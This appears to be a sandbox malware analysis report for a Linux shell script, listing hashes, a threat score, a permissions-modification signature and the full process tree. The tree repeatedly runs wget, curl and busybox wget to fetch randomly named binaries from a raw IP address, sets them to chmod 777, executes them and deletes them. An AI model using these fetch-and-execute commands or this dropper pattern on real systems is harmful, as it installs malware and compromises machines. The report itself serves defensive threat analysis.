d91598cbe809a777eda879117574ae48a38a5e5ce754f73085117b25104ef05a

Analysis

max time kernel
11s
max time network
131s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
21-11-2024 08:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d91598cbe809a777eda879117574ae48a38a5e5ce754f73085117b25104ef05a.sh
Size

10KB
MD5

40acb9bbdc30eee90db1699fc64664f0
SHA1

e7f465a62fe2f5943e5c8d4cb0f279f026f536b5
SHA256

d91598cbe809a777eda879117574ae48a38a5e5ce754f73085117b25104ef05a
SHA512

b0d6779c6beb7671facf61f8e5585c55ab7b2b631bac3813ce58bffbffd5993de30f3a8ea75780c9117bbc93739d77c4ef6300ab47e608ee405fb089fc6b6a8d
SSDEEP

192:m5Z/77fdck0awgfSex7RRJkIN18JpAEMVA4og7XDu7iuKGuie7MUZEMVW4ogJpWX:wWWNxmGJjB4

Score

7^/10

defense_evasion

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 28 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1547	chmod
1686	chmod
1565	chmod
1613	chmod
1637	chmod
1559	chmod
1631	chmod
1661	chmod
1607	chmod
1534	chmod
1553	chmod
1577	chmod
1520	chmod
1619	chmod
1625	chmod
1680	chmod
1583	chmod
1589	chmod
1595	chmod
1667	chmod
1674	chmod
1601	chmod
1643	chmod
1649	chmod
1655	chmod
1514	chmod
1541	chmod
1571	chmod

Executes dropped EXE 28 IoCs

Writes file to tmp directory 28 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN	curl
File opened for modification	/tmp/fTibODpmVMM8UOxhb1q9woUY1lrBDxOM8G	curl
File opened for modification	/tmp/15abOuZMV7A9KJTFH87FM9kB2d3TVsSk2p	curl
File opened for modification	/tmp/S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ	curl
File opened for modification	/tmp/NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN	curl
File opened for modification	/tmp/7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji	curl
File opened for modification	/tmp/uvhV9m5KaLeN2x38H0VzxUaS8EUtxlgrsn	curl
File opened for modification	/tmp/vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx2	curl
File opened for modification	/tmp/FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk	curl
File opened for modification	/tmp/FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk	curl
File opened for modification	/tmp/jTU0dNOxRxwGywxWwrw7oX9kMcJa186GKG	curl
File opened for modification	/tmp/lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU7	curl
File opened for modification	/tmp/ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl0	curl
File opened for modification	/tmp/EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw	curl
File opened for modification	/tmp/ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl0	curl
File opened for modification	/tmp/15abOuZMV7A9KJTFH87FM9kB2d3TVsSk2p	curl
File opened for modification	/tmp/jTU0dNOxRxwGywxWwrw7oX9kMcJa186GKG	curl
File opened for modification	/tmp/vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx2	curl
File opened for modification	/tmp/oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV	curl
File opened for modification	/tmp/S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ	curl
File opened for modification	/tmp/oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV	curl
File opened for modification	/tmp/uvhV9m5KaLeN2x38H0VzxUaS8EUtxlgrsn	curl
File opened for modification	/tmp/EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw	curl
File opened for modification	/tmp/lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU7	curl
File opened for modification	/tmp/gBs9wtUvbF3o0SjOQ4DPC1Y7iVqWtr8NLI	curl
File opened for modification	/tmp/gBs9wtUvbF3o0SjOQ4DPC1Y7iVqWtr8NLI	curl
File opened for modification	/tmp/7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji	curl
File opened for modification	/tmp/fTibODpmVMM8UOxhb1q9woUY1lrBDxOM8G	curl

/tmp/d91598cbe809a777eda879117574ae48a38a5e5ce754f73085117b25104ef05a.sh
/tmp/d91598cbe809a777eda879117574ae48a38a5e5ce754f73085117b25104ef05a.sh
1⤵
PID:1506
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:1507
- /usr/bin/wget
  wget http://87.120.125.191/bins/fTibODpmVMM8UOxhb1q9woUY1lrBDxOM8G
  2⤵
  PID:1508
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/fTibODpmVMM8UOxhb1q9woUY1lrBDxOM8G
  2⤵
  - Writes file to tmp directory
  PID:1509
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/fTibODpmVMM8UOxhb1q9woUY1lrBDxOM8G
  2⤵
  PID:1513
- /bin/chmod
  chmod 777 fTibODpmVMM8UOxhb1q9woUY1lrBDxOM8G
  2⤵
  - File and Directory Permissions Modification
  PID:1514
- /tmp/fTibODpmVMM8UOxhb1q9woUY1lrBDxOM8G
  ./fTibODpmVMM8UOxhb1q9woUY1lrBDxOM8G
  2⤵
  - Executes dropped EXE
  PID:1515
- /bin/rm
  rm fTibODpmVMM8UOxhb1q9woUY1lrBDxOM8G
  2⤵
  PID:1516
- /usr/bin/wget
  wget http://87.120.125.191/bins/gBs9wtUvbF3o0SjOQ4DPC1Y7iVqWtr8NLI
  2⤵
  PID:1517
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/gBs9wtUvbF3o0SjOQ4DPC1Y7iVqWtr8NLI
  2⤵
  - Writes file to tmp directory
  PID:1518
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/gBs9wtUvbF3o0SjOQ4DPC1Y7iVqWtr8NLI
  2⤵
  PID:1519
- /bin/chmod
  chmod 777 gBs9wtUvbF3o0SjOQ4DPC1Y7iVqWtr8NLI
  2⤵
  - File and Directory Permissions Modification
  PID:1520
- /tmp/gBs9wtUvbF3o0SjOQ4DPC1Y7iVqWtr8NLI
  ./gBs9wtUvbF3o0SjOQ4DPC1Y7iVqWtr8NLI
  2⤵
  - Executes dropped EXE
  PID:1521
- /bin/rm
  rm gBs9wtUvbF3o0SjOQ4DPC1Y7iVqWtr8NLI
  2⤵
  PID:1523
- /usr/bin/wget
  wget http://87.120.125.191/bins/uvhV9m5KaLeN2x38H0VzxUaS8EUtxlgrsn
  2⤵
  PID:1524
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/uvhV9m5KaLeN2x38H0VzxUaS8EUtxlgrsn
  2⤵
  - Writes file to tmp directory
  PID:1525
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/uvhV9m5KaLeN2x38H0VzxUaS8EUtxlgrsn
  2⤵
  PID:1530
- /bin/chmod
  chmod 777 uvhV9m5KaLeN2x38H0VzxUaS8EUtxlgrsn
  2⤵
  - File and Directory Permissions Modification
  PID:1534
- /tmp/uvhV9m5KaLeN2x38H0VzxUaS8EUtxlgrsn
  ./uvhV9m5KaLeN2x38H0VzxUaS8EUtxlgrsn
  2⤵
  - Executes dropped EXE
  PID:1535
- /bin/rm
  rm uvhV9m5KaLeN2x38H0VzxUaS8EUtxlgrsn
  2⤵
  PID:1536
- /usr/bin/wget
  wget http://87.120.125.191/bins/lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU7
  2⤵
  PID:1537
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU7
  2⤵
  - Writes file to tmp directory
  PID:1539
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU7
  2⤵
  PID:1540
- /bin/chmod
  chmod 777 lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU7
  2⤵
  - File and Directory Permissions Modification
  PID:1541
- /tmp/lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU7
  ./lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU7
  2⤵
  - Executes dropped EXE
  PID:1542
- /bin/rm
  rm lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU7
  2⤵
  PID:1543
- /usr/bin/wget
  wget http://87.120.125.191/bins/vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx2
  2⤵
  PID:1544
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx2
  2⤵
  - Writes file to tmp directory
  PID:1545
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx2
  2⤵
  PID:1546
- /bin/chmod
  chmod 777 vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx2
  2⤵
  - File and Directory Permissions Modification
  PID:1547
- /tmp/vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx2
  ./vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx2
  2⤵
  - Executes dropped EXE
  PID:1548
- /bin/rm
  rm vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx2
  2⤵
  PID:1549
- /usr/bin/wget
  wget http://87.120.125.191/bins/15abOuZMV7A9KJTFH87FM9kB2d3TVsSk2p
  2⤵
  PID:1550
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/15abOuZMV7A9KJTFH87FM9kB2d3TVsSk2p
  2⤵
  - Writes file to tmp directory
  PID:1551
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/15abOuZMV7A9KJTFH87FM9kB2d3TVsSk2p
  2⤵
  PID:1552
- /bin/chmod
  chmod 777 15abOuZMV7A9KJTFH87FM9kB2d3TVsSk2p
  2⤵
  - File and Directory Permissions Modification
  PID:1553
- /tmp/15abOuZMV7A9KJTFH87FM9kB2d3TVsSk2p
  ./15abOuZMV7A9KJTFH87FM9kB2d3TVsSk2p
  2⤵
  - Executes dropped EXE
  PID:1554
- /bin/rm
  rm 15abOuZMV7A9KJTFH87FM9kB2d3TVsSk2p
  2⤵
  PID:1555
- /usr/bin/wget
  wget http://87.120.125.191/bins/jTU0dNOxRxwGywxWwrw7oX9kMcJa186GKG
  2⤵
  PID:1556
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/jTU0dNOxRxwGywxWwrw7oX9kMcJa186GKG
  2⤵
  - Writes file to tmp directory
  PID:1557
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/jTU0dNOxRxwGywxWwrw7oX9kMcJa186GKG
  2⤵
  PID:1558
- /bin/chmod
  chmod 777 jTU0dNOxRxwGywxWwrw7oX9kMcJa186GKG
  2⤵
  - File and Directory Permissions Modification
  PID:1559
- /tmp/jTU0dNOxRxwGywxWwrw7oX9kMcJa186GKG
  ./jTU0dNOxRxwGywxWwrw7oX9kMcJa186GKG
  2⤵
  - Executes dropped EXE
  PID:1560
- /bin/rm
  rm jTU0dNOxRxwGywxWwrw7oX9kMcJa186GKG
  2⤵
  PID:1561
- /usr/bin/wget
  wget http://87.120.125.191/bins/ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl0
  2⤵
  PID:1562
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl0
  2⤵
  - Writes file to tmp directory
  PID:1563
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl0
  2⤵
  PID:1564
- /bin/chmod
  chmod 777 ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl0
  2⤵
  - File and Directory Permissions Modification
  PID:1565
- /tmp/ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl0
  ./ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl0
  2⤵
  - Executes dropped EXE
  PID:1566
- /bin/rm
  rm ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl0
  2⤵
  PID:1567
- /usr/bin/wget
  wget http://87.120.125.191/bins/FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk
  2⤵
  PID:1568
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk
  2⤵
  - Writes file to tmp directory
  PID:1569
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk
  2⤵
  PID:1570
- /bin/chmod
  chmod 777 FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk
  2⤵
  - File and Directory Permissions Modification
  PID:1571
- /tmp/FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk
  ./FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk
  2⤵
  - Executes dropped EXE
  PID:1572
- /bin/rm
  rm FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk
  2⤵
  PID:1573
- /usr/bin/wget
  wget http://87.120.125.191/bins/S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ
  2⤵
  PID:1574
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ
  2⤵
  - Writes file to tmp directory
  PID:1575
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ
  2⤵
  PID:1576
- /bin/chmod
  chmod 777 S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ
  2⤵
  - File and Directory Permissions Modification
  PID:1577
- /tmp/S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ
  ./S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ
  2⤵
  - Executes dropped EXE
  PID:1578
- /bin/rm
  rm S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ
  2⤵
  PID:1579
- /usr/bin/wget
  wget http://87.120.125.191/bins/7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji
  2⤵
  PID:1580
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji
  2⤵
  - Writes file to tmp directory
  PID:1581
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji
  2⤵
  PID:1582
- /bin/chmod
  chmod 777 7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji
  2⤵
  - File and Directory Permissions Modification
  PID:1583
- /tmp/7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji
  ./7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji
  2⤵
  - Executes dropped EXE
  PID:1584
- /bin/rm
  rm 7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji
  2⤵
  PID:1585
- /usr/bin/wget
  wget http://87.120.125.191/bins/NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN
  2⤵
  PID:1586
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN
  2⤵
  - Writes file to tmp directory
  PID:1587
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN
  2⤵
  PID:1588
- /bin/chmod
  chmod 777 NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN
  2⤵
  - File and Directory Permissions Modification
  PID:1589
- /tmp/NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN
  ./NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN
  2⤵
  - Executes dropped EXE
  PID:1590
- /bin/rm
  rm NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN
  2⤵
  PID:1591
- /usr/bin/wget
  wget http://87.120.125.191/bins/EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw
  2⤵
  PID:1592
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw
  2⤵
  - Writes file to tmp directory
  PID:1593
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw
  2⤵
  PID:1594
- /bin/chmod
  chmod 777 EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw
  2⤵
  - File and Directory Permissions Modification
  PID:1595
- /tmp/EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw
  ./EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw
  2⤵
  - Executes dropped EXE
  PID:1596
- /bin/rm
  rm EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw
  2⤵
  PID:1597
- /usr/bin/wget
  wget http://87.120.125.191/bins/oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV
  2⤵
  PID:1598
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV
  2⤵
  - Writes file to tmp directory
  PID:1599
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV
  2⤵
  PID:1600
- /bin/chmod
  chmod 777 oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV
  2⤵
  - File and Directory Permissions Modification
  PID:1601
- /tmp/oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV
  ./oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV
  2⤵
  - Executes dropped EXE
  PID:1602
- /bin/rm
  rm oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV
  2⤵
  PID:1603
- /usr/bin/wget
  wget http://87.120.125.191/bins/FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk
  2⤵
  PID:1604
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk
  2⤵
  - Writes file to tmp directory
  PID:1605
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk
  2⤵
  PID:1606
- /bin/chmod
  chmod 777 FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk
  2⤵
  - File and Directory Permissions Modification
  PID:1607
- /tmp/FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk
  ./FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk
  2⤵
  - Executes dropped EXE
  PID:1608
- /bin/rm
  rm FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk
  2⤵
  PID:1609
- /usr/bin/wget
  wget http://87.120.125.191/bins/S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ
  2⤵
  PID:1610
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ
  2⤵
  - Writes file to tmp directory
  PID:1611
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ
  2⤵
  PID:1612
- /bin/chmod
  chmod 777 S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ
  2⤵
  - File and Directory Permissions Modification
  PID:1613
- /tmp/S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ
  ./S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ
  2⤵
  - Executes dropped EXE
  PID:1614
- /bin/rm
  rm S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ
  2⤵
  PID:1615
- /usr/bin/wget
  wget http://87.120.125.191/bins/ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl0
  2⤵
  PID:1616
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl0
  2⤵
  - Writes file to tmp directory
  PID:1617
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl0
  2⤵
  PID:1618
- /bin/chmod
  chmod 777 ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl0
  2⤵
  - File and Directory Permissions Modification
  PID:1619
- /tmp/ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl0
  ./ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl0
  2⤵
  - Executes dropped EXE
  PID:1620
- /bin/rm
  rm ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl0
  2⤵
  PID:1621
- /usr/bin/wget
  wget http://87.120.125.191/bins/EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw
  2⤵
  PID:1622
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw
  2⤵
  - Writes file to tmp directory
  PID:1623
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw
  2⤵
  PID:1624
- /bin/chmod
  chmod 777 EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw
  2⤵
  - File and Directory Permissions Modification
  PID:1625
- /tmp/EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw
  ./EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw
  2⤵
  - Executes dropped EXE
  PID:1626
- /bin/rm
  rm EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw
  2⤵
  PID:1627
- /usr/bin/wget
  wget http://87.120.125.191/bins/oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV
  2⤵
  PID:1628
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV
  2⤵
  - Writes file to tmp directory
  PID:1629
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV
  2⤵
  PID:1630
- /bin/chmod
  chmod 777 oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV
  2⤵
  - File and Directory Permissions Modification
  PID:1631
- /tmp/oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV
  ./oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV
  2⤵
  - Executes dropped EXE
  PID:1632
- /bin/rm
  rm oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV
  2⤵
  PID:1633
- /usr/bin/wget
  wget http://87.120.125.191/bins/7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji
  2⤵
  PID:1634
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji
  2⤵
  - Writes file to tmp directory
  PID:1635
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji
  2⤵
  PID:1636
- /bin/chmod
  chmod 777 7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji
  2⤵
  - File and Directory Permissions Modification
  PID:1637
- /tmp/7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji
  ./7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji
  2⤵
  - Executes dropped EXE
  PID:1638
- /bin/rm
  rm 7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji
  2⤵
  PID:1639
- /usr/bin/wget
  wget http://87.120.125.191/bins/NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN
  2⤵
  PID:1640
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN
  2⤵
  - Writes file to tmp directory
  PID:1641
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN
  2⤵
  PID:1642
- /bin/chmod
  chmod 777 NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN
  2⤵
  - File and Directory Permissions Modification
  PID:1643
- /tmp/NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN
  ./NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN
  2⤵
  - Executes dropped EXE
  PID:1644
- /bin/rm
  rm NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN
  2⤵
  PID:1645
- /usr/bin/wget
  wget http://87.120.125.191/bins/lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU7
  2⤵
  PID:1646
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU7
  2⤵
  - Writes file to tmp directory
  PID:1647
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU7
  2⤵
  PID:1648
- /bin/chmod
  chmod 777 lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU7
  2⤵
  - File and Directory Permissions Modification
  PID:1649
- /tmp/lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU7
  ./lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU7
  2⤵
  - Executes dropped EXE
  PID:1650
- /bin/rm
  rm lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU7
  2⤵
  PID:1651
- /usr/bin/wget
  wget http://87.120.125.191/bins/vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx2
  2⤵
  PID:1652
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx2
  2⤵
  - Writes file to tmp directory
  PID:1653
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx2
  2⤵
  PID:1654
- /bin/chmod
  chmod 777 vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx2
  2⤵
  - File and Directory Permissions Modification
  PID:1655
- /tmp/vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx2
  ./vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx2
  2⤵
  - Executes dropped EXE
  PID:1656
- /bin/rm
  rm vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx2
  2⤵
  PID:1657
- /usr/bin/wget
  wget http://87.120.125.191/bins/fTibODpmVMM8UOxhb1q9woUY1lrBDxOM8G
  2⤵
  PID:1658
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/fTibODpmVMM8UOxhb1q9woUY1lrBDxOM8G
  2⤵
  - Writes file to tmp directory
  PID:1659
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/fTibODpmVMM8UOxhb1q9woUY1lrBDxOM8G
  2⤵
  PID:1660
- /bin/chmod
  chmod 777 fTibODpmVMM8UOxhb1q9woUY1lrBDxOM8G
  2⤵
  - File and Directory Permissions Modification
  PID:1661
- /tmp/fTibODpmVMM8UOxhb1q9woUY1lrBDxOM8G
  ./fTibODpmVMM8UOxhb1q9woUY1lrBDxOM8G
  2⤵
  - Executes dropped EXE
  PID:1662
- /bin/rm
  rm fTibODpmVMM8UOxhb1q9woUY1lrBDxOM8G
  2⤵
  PID:1663
- /usr/bin/wget
  wget http://87.120.125.191/bins/gBs9wtUvbF3o0SjOQ4DPC1Y7iVqWtr8NLI
  2⤵
  PID:1664
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/gBs9wtUvbF3o0SjOQ4DPC1Y7iVqWtr8NLI
  2⤵
  - Writes file to tmp directory
  PID:1665
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/gBs9wtUvbF3o0SjOQ4DPC1Y7iVqWtr8NLI
  2⤵
  PID:1666
- /bin/chmod
  chmod 777 gBs9wtUvbF3o0SjOQ4DPC1Y7iVqWtr8NLI
  2⤵
  - File and Directory Permissions Modification
  PID:1667
- /tmp/gBs9wtUvbF3o0SjOQ4DPC1Y7iVqWtr8NLI
  ./gBs9wtUvbF3o0SjOQ4DPC1Y7iVqWtr8NLI
  2⤵
  - Executes dropped EXE
  PID:1668
- /bin/rm
  rm gBs9wtUvbF3o0SjOQ4DPC1Y7iVqWtr8NLI
  2⤵
  PID:1670
- /usr/bin/wget
  wget http://87.120.125.191/bins/uvhV9m5KaLeN2x38H0VzxUaS8EUtxlgrsn
  2⤵
  PID:1671
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/uvhV9m5KaLeN2x38H0VzxUaS8EUtxlgrsn
  2⤵
  - Writes file to tmp directory
  PID:1672
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/uvhV9m5KaLeN2x38H0VzxUaS8EUtxlgrsn
  2⤵
  PID:1673
- /bin/chmod
  chmod 777 uvhV9m5KaLeN2x38H0VzxUaS8EUtxlgrsn
  2⤵
  - File and Directory Permissions Modification
  PID:1674
- /tmp/uvhV9m5KaLeN2x38H0VzxUaS8EUtxlgrsn
  ./uvhV9m5KaLeN2x38H0VzxUaS8EUtxlgrsn
  2⤵
  - Executes dropped EXE
  PID:1675
- /bin/rm
  rm uvhV9m5KaLeN2x38H0VzxUaS8EUtxlgrsn
  2⤵
  PID:1676
- /usr/bin/wget
  wget http://87.120.125.191/bins/15abOuZMV7A9KJTFH87FM9kB2d3TVsSk2p
  2⤵
  PID:1677
- /usr/bin/curl
